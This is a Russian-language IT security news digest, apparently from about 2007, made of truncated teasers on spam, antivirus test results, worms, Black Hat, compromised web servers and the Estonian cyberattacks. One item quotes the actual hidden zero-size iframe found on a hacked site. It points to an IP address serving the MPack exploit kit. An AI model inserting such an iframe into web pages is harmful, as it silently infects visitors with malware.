Особо отмечается негативное влияние спама на работу компаний: "Сегодня для компаний спам превратился в одну из важнейших технологических проблем. Ведь на кону не только потраченные впустую ресурсы и снижение продуктивности, а еще и безопасность, поскольку всегда присутствует риск того, что эти нежелательные сообщения могут быть заражены", - считает г-н Фернандес, продукт-менеджер TrustLayer Mail. К стабильному уровню спама добавляется возросшее число случаев обнаружения... Читать дальше »

Пользователю будут показывать котят, собак и другие простые изображения и предлагать ввести описание в поле защиты от автоматической регистрации.

Спамерам уже удалось распознать искажённые цифры и буквы, предлагаемые при создании учётных записей на Hotmail и Yahoo. С изображениями животных дела у спамеров будут обстоять сложнее. Но их придётся искажать, либо создавать масштабный каталог картинок. Если изображений будет конечное количество, спамеры смогут обмануть систему ещё быстрее. Причина этого - в хара... Читать дальше »

Тестирование дисквалифицировало 7 продуктов: eTrust (CA), 3 продукта Trend Micro, FortiClient от Fortinet, Ikarus Utilities и Virus Buster. ETrust поставлялся с установками по умолчанию, позволяющими игнорировать большое количество форматов файлов, в которых могут находиться вирусы. Не каждый пользователь способен настроить приложение должным образом; поэтому оно было признано неэффективным.

Все три продукта, представленные Trend Micro, «отличились» ложным срабатыванием на один из инструментариев для разработчиков от Microsoft. Остальные дисквалифицированные продукты также находили вредоносный код в легальных приложениях. Такое поведение антивирусов способно, в конечном счёте, привести к нарушению работы компьютера, поскольку пользователь может удалить важные файлы, ложно отмеченные как вредоносн... Читать дальше »

«Эти письма маскируются под материалы о знаменитостях для взрослых, искушая неопытных пользователей открыть файл, который установит руткит и загрузит дополнительный вредоносный код из интернета, - сказал Грэм Клули (Graham Cluley), старший технический консультант Sophos. – В этой уловке социальной инженерии нет ничего нового – она используется довольно часто, но от этого не стала менее эффективной».

Пакет VMware Fusion позволяет запускать на компьютерах Apple, работающих под управлением Mac OS X, операционные системы Windows, Linux и Solaris. Среди ключевых особенностей продукта разработчики выделяют поддержку 32-битных и 64-разрядных программных платформ, возможность запуска трехмерных игр для Windows (поддерживается программный интерфейс Microsoft DirectX 8.1), простоту использования и удобный интерфейс.

Средства VMware Fusion автоматически распознают раздел жесткого диска, сформированный при помощи инструментария Boot Camp, и позволяют загружать в виртуальную машину операционную систему Windows, установленную посредством программы виртуализации Apple. Среди прочих особенностей VMware Fusion можно упомянуть по... Читать дальше »

Свою незаконную деятельность Смит начал несколько лет назад. Молодой человек рассылал миллионы электронных сообщений с рекламой порнографии, а также лекарственных препаратов, отпускающихся по рецептам. Принадлежащая киберпреступнику фармацевтическая фирма Xpress Pharmacy, занимавшаяся незаконными продажами лекарств, приносила многомиллионную прибыль. В общей сложности Смит реализовал препараты на сумму в 24 миллиона долларов США. Молодой человек ездил на дорогих автомобилях и проживал в роскошных апартаментах.

AOL, интернет-подразделение медиагиганта Time Warner, инициировало иск против Смита, обвинив его в незаконной рассылке рекламы. На время разбирательства суд обязал молодого человека прекратить торговлю лекарственными препаратами и заморозил банковские счета с... Читать дальше »

Предложенная Microsoft методика предусматривает, к примеру, размещение около телевизора миниатюрной камеры, которая сможет не только сигнализировать о присутствии зрителя у экрана, но даже идентифицировать его на основе имеющихся в локальной памяти устройства изображений, либо сопоставляя внешность человека с ранее заданными чертами. Для установления личности зрителя также может использоваться биометрический сенсор, встроенный, например, в пульт ДУ.

Таким образом, Microsoft планирует собирать для рекламодателей самую разную информацию о телеаудитории. В частности, об интересах зрителя, его хобби, половой и этнической принадлежности, профессии, семейном п... Читать дальше »

Червь под названием Deletemusic распространяется через съемные диски. При обращении к диску червь запускается, записывает себя на все доступные разделы (в том числе и на другие съемные диски), после чего прописывает себя в автозагрузку ОС.

После перезагрузки компьютера вирус удаляет все файлы на компьютере с расширением MP3.

Черви с функцией удаления музыки - не новость в мире вирусов. Так уже делали Klez-F в 2002 г., Scrambler или Mylife-G. Естественно, никакие из перечисленных вирусов не пытаются определить, лицензионную ли музыку они удаляют.

Причина появления домашнего животного на рабочем месте Стинт не сообщается. Пока хозяйка отвлеклась на разговор с сотрудником, собака обнаружила серверную стойку и справила на нее естественную нужду. В результате действий собаки компания потеряла все данные, хранившиеся на сервере.

Представители компании отметили, что, к счастью, существуют резервные копии наиболее важной информации, но на восстановление данных потребуется несколько дней.

Прежде всего, необходимо упомянуть о мощной спам-рассылке, наблюдаемой в течение месяца, с темой писем «You've received an ecard from a Class-mate!» («Вы получили электронную открытку от одноклассника») и.т.п. В теле таких писем содержалась ссылка, по которой можно было скачать «поздравительную открытку». Доверчивость и любопытство оборачивались бедой для пользователей: их ПК подвергались заражению новыми версиями вредоносной программы BackDoor.Groan. Она устанавливает драйвер для сокрытия своих файлов на диске, содержит функцию работы с P2P-сетями и производит рассылку спама с поражённого компьютера.

Почтовый червь массовой рассылки Win32.HLLM.Limar в этом месяце был не столь заметен, как ранее. Лишь однажды было зафиксировано повышение уровня его присутствия в почтовом трафике... Читать дальше »

Наборы исправлений предназначались для бета-тестеров серверной операционной системы Windows Server 2008, ядро которой имеет много общего с ядром Windows Vista. Всего в Сеть утекли два пакета апдейтов под названиями Vista Performance and Reliability Pack и Vista Compatibility and Reliability Pack. Большая часть исправлений в этих пакетах связаны с надежностью, стабильностью работы и производительностью программной платформы Windows Vista.

Полный список исправлений приводится на сайте nVNews. Корпорация Microsoft, в частности, решила проблему недостаточно высокой скорости копирования директорий большого объема, а также улучшила алгоритмы возобновления работы после выхода из спящего режима. Кроме того, были исправлен... Читать дальше »

Разработчики предупреждают, что используемый метод установки драйверов отличается от такового в Vista, некоторые драйверы могут быть абсолютно несовместимы и вести к проблемам в работе системы, поэтому следует осторожно использовать Atsiv. "Весь риск от использования этой программы ложится на вас", - уведомляет Linc... Читать дальше »

Организаторы обещают раскрыть 20 новых уязвимостей и представить инструменты для взлома. Несмотря на то, что конференция называется «Чёрные шляпы», на ней собралось множество «белых шляп» - этичных хакеров, а также представителей правительственных агентств, в частности, АНБ и киберполицейских.

На брифингах будут обсуждаться ботнеты, атаки на Эстонию, социальные сети MySpace, Flickr и другие. Исследователи представят подробности уязвимости в браузере Safari, позволяющей захватить контроль над iPhone.

Те же темы будут обсуждаться на конференции DefCon, которая состоится в Лас-Вегасе в пятницу, после окончания Black... Читать дальше »

Только каждый пятый сайт, на котором был обнаружен вредоносный код, был специально создан для этого. Остальное – это взломанные сайты с внедренными на них эксплоитами.

Достаточно скомпрометировать один файл на Web сервере, чтобы внедрить вредоносный код на всех Web сайтах , которые расположены на этом сервере. Наиболее взламываемые Web сервера в первой половине 2007 года:
Apache 51.0%
Microsoft IIS 6 34.0%
Microsoft IIS 5 9.0%
nginx 3.0%
Другие 3.0%
Как видно из представленных данных, более половины Web страниц были расположены на Web серверах Apache. Ранее в этом году во время глобальной ObfJS атаки, 98% взломанных серверов работали под управлением Apache, работающем на Unix платформах.

Читать дальше »

Глава корпорации Mozilla Митчелл Бейкер сказал, что дальнейшей разработкой и поддержкой Thunderbird должна заняться "новая организация". В числе возможных вариантов развития Thunderbird Бейкер назвал создание отдельной организации, которая будет поддерживать почтовик. Вторым вариантом Бейкер считает создание подразделения в рамках Mozilla для работы с почтовым клиентом.

Бесплатный почтовый клиент Thunderbird с момента выпуска его первой версии в 2004 был скачан более 50 миллионов раз. Версии этого клиента существуют для большинства операционных систем, включая Mac OS X, Windows и Linux.

Напомним, что в прошлый вторник компания Microsoft выпустила заплатку, устраняющую критическую уязвимость в Microsoft Visio. В 2007 году было опубликовано 12 уведомлений об устранении уязвимостей в различных компонентах Microsoft Office, 6 их которых позволяли выполнение произвольного кода.

Как сообщили ИТАР-ТАСС в руководстве общественно-правового Чешского телевидения, ответственность за хакерскую атаку взяла на себя так называемая творческая группа "Зтоховен". Хакеры грозят повторением атаки. В связи с этим представители телевидения обратились к правоохранительным органам, чтобы пресечь противоправные действия.

Телеэфир был нарушен во время трансляции информационной программы "Панорама", транслировавшейся по Второму каналу Чешского телевидения. Происшедшее стало первым слу... Читать дальше »

Как сообщается в предварительном уведомлении, четыре из шести бюллетеней будут содержать сведения о критически опасных уязвимостях. Эти дыры теоретически могут использоваться с целью получения доступа к удаленному компьютеру и последующего выполнения на нем произвольного вредоносного кода. Уязвимости, получившие максимальный рейтинг опасности, выявлены, в частности, в программе Outlook Express, браузере Internet Explorer и почтовом клиенте Windows Mail, входящем в состав операционных систем Windows Vista (в том числе 64-битных версий).

При детальном анализе оказалось, что на главной странице сайта содержался код

< iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0>

загружающий на компьютер пользователя программу Mpack, которая используется для загрузки вредоносного ПО на удаленные компьютеры за счет эксплуатации многочисленных уязвимостей.
За небольшой промежуток времени, пока висел троян, риску заражения подверглись несколько десятков тысяч пользователей сайта.

Они также знали по опыту, что "если на улицах дерутся, то будут драться и в интернете", отметил Хиллар Аарелаид, директор эстонской Компьютерной команды быстрого реагирования. В конце концов, в быту местных жителей роль интернета едва ли уступает значимости водопровода: интернет-сетью здесь запросто пользуются для голосования, заполнения деклараций о доходах для налогового ведомства, а также – через сотовые телефоны – для совершения покупок или оплаты парковки.

И тут разразилось то, что в Эстонии некоторые называют первой войной в киберпространстве. Эта кампания, продлившаяся целый м... Читать дальше »